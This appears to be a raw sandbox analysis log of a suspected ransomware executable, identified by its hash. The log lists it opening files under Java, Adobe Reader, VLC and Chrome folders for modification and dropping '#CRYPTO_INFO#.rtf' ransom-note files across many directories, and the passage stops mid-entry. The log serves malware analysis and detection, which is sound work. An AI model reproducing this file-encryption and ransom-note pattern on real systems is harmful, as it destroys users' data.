8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticnotification.exsd 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\bg_patterns_header.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\server_issue.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\back-arrow-default.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\cstm_brand_preview.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\da-dk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\move.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\ui.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\orbd.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\ind_prog.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\init.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\LICENSE 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fr-ma\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fr-fr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\launcher.win32.win32.x86_64.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-api-progress.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\nb-no\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\new_icons_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-ae\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\s_radio_unselected_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons__retina_hiContrast_bow.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\ECLIPSE_.SF 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.lucene.analysis_3.5.0.v20120725-1805.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jre1.8.0_66\lib\security\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\license.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner_dark.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluEmptyStateCCFiles_280x192.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\de-de\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\de-de\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.sat4j.pb_2.3.5.v201404071733.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_reject_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\plugins\rhp\combinepdf-tool-view.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\pl.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.emf.common_2.10.1.v20140901-1043.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\it-it\PlayStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\eu-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ja-jp\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\about.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\jabswitch.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-multitabs.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-win.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\hr-hr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\win32\jawt_md.h 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\feature.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\AddressBook2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\next-arrow-disabled.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\de-de\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-heapwalker_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\file_info2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\LICENSE 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sk-sk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-sampler.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nb-no\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ja-jp\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\zh-tw\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.intro_3.4.200.v20130326-1254.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\pl-pl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\es-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\pl-pl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\it-it\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\include\win32\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\pt-br\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\dd_arrow_small.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ca-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\css\main-selector.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\org-openide-util.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.artifact.repository.prefs 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ja_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-spi-actions_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filterselected-hover_32.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\uk-ua\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\share.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_zh_CN.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\java-rmi.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\selection-actions.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\fi-fi\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\example_icons2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\css\main-selector.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\uk-ua\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\ExitRemove.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program 